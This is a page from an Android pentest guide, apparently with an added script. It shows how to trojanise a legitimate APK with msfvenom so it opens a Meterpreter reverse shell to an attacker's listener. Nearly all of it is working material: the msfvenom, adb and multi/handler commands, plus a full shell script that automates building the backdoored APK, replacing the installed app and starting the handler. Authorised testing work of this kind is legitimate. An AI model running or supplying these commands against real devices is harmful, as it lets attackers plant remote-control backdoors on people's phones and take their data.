[A]ndroid [A]pplication [P]entest [G]uide

4.2 Quick Proof-of-Concept (Meterpreter)


Last updated 5 years ago


This revealed to me a functionality which I was not aware of - msfvenom does everything for you!

This works for Xamarin apps as well.

Create backdoored apk

msfvenom -x /path/to/target_app.apk -p android/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o target_modified.apk

Output: Saved as: target_modified.apk

Install application

adb install target_modified.apk

Start meterpreter session handler

(use the same payload, IP and port you used to generate the APK above, otherwise the stager and the handler will not speak the same transport):

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run

START APPLICATION ON DEVICE AND HAVE FUN!!! ;)

Launching the app runs the injected payload (msfvenom hooks the launcher activity so the stager starts with it), and the session shows up in the handler.
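The four steps above as one script, added here as an example (it is not part of the original guide): it validates LHOST and LPORT, builds the backdoored APK with msfvenom, lists the zip entries msfvenom injected, writes a handler resource script from the very same payload/host/port so they cannot drift apart, and removes an already installed copy of the app before `adb install` (the modified APK is signed with a different key, so installing over the original fails). It assumes msfvenom, msfconsole, adb and unzip are on PATH; aapt is optional; the file names target_modified.apk and handler.rc are arbitrary choices.

```sh
#!/bin/sh
# Added example, not from the original guide: drive the msfvenom -> adb ->
# multi/handler procedure from one script so the payload, LHOST and LPORT used
# to build the APK are exactly the ones the handler listens with.
# Assumes msfvenom, msfconsole, adb and unzip on PATH; aapt is optional.
set -eu

PAYLOAD=android/meterpreter/reverse_tcp   # must be the same in msfvenom and the handler

# Accept only a dotted-quad IPv4 address with each octet in 0..255.
valid_ipv4() {
  ip=$1
  case $ip in *[!0-9.]*|.*|*.|*..*) return 1 ;; esac
  old_ifs=$IFS; IFS=.
  set -f; set -- $ip; set +f        # split on dots, globbing off
  IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Accept only a TCP port in 1..65535.
valid_port() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Emit an msfconsole resource script for the handler of the given payload.
# ExitOnSession false keeps the listener up after the first session.
handler_rc() {
  printf 'use exploit/multi/handler\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n' "$1" "$2" "$3"
}

# List zip entries present in the backdoored APK but not in the original,
# i.e. what msfvenom injected (needs unzip).
injected_entries() {
  a=$(mktemp); b=$(mktemp)
  unzip -Z1 "$1" | sort > "$a"
  unzip -Z1 "$2" | sort > "$b"
  comm -13 "$a" "$b"
  rm -f "$a" "$b"
}

# Build the backdoored APK, show what was injected, write handler.rc.
backdoor_apk() {
  apk=$1; lhost=$2; lport=$3; out=$4
  [ -f "$apk" ] || { echo "no such APK: $apk" >&2; return 1; }
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  msfvenom -x "$apk" -p "$PAYLOAD" LHOST="$lhost" LPORT="$lport" -o "$out"
  [ -s "$out" ] || { echo "msfvenom wrote nothing to $out" >&2; return 1; }
  echo "entries added to $out:"
  injected_entries "$apk" "$out"
  handler_rc "$PAYLOAD" "$lhost" "$lport" > handler.rc
}

# Install the modified APK. It is signed with a different key than the
# original, so an already installed copy must go first or adb fails with
# INSTALL_FAILED_UPDATE_INCOMPATIBLE. Package name comes from aapt if present.
install_apk() {
  if command -v aapt >/dev/null 2>&1; then
    pkg=$(aapt dump badging "$1" | sed -n "s/^package: name='\([^']*\)'.*/\1/p")
    [ -n "$pkg" ] && adb uninstall "$pkg" >/dev/null 2>&1 || true
  fi
  adb install "$1"
}

# The pipeline runs only when called with four arguments, e.g.
#   ./backdoor.sh target_app.apk 10.0.0.5 4444 target_modified.apk
# so the functions above can be sourced or tested without a device.
if [ $# -eq 4 ]; then
  backdoor_apk "$1" "$2" "$3" "$4"
  install_apk "$4"
  msfconsole -q -r handler.rc     # then launch the app on the device
fi
```

Keeping the payload name in one variable is the point: the mistake this guards against is generating a reverse_tcp stager and starting a reverse_https handler, which looks like "the app never connects back" but is just a transport mismatch.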
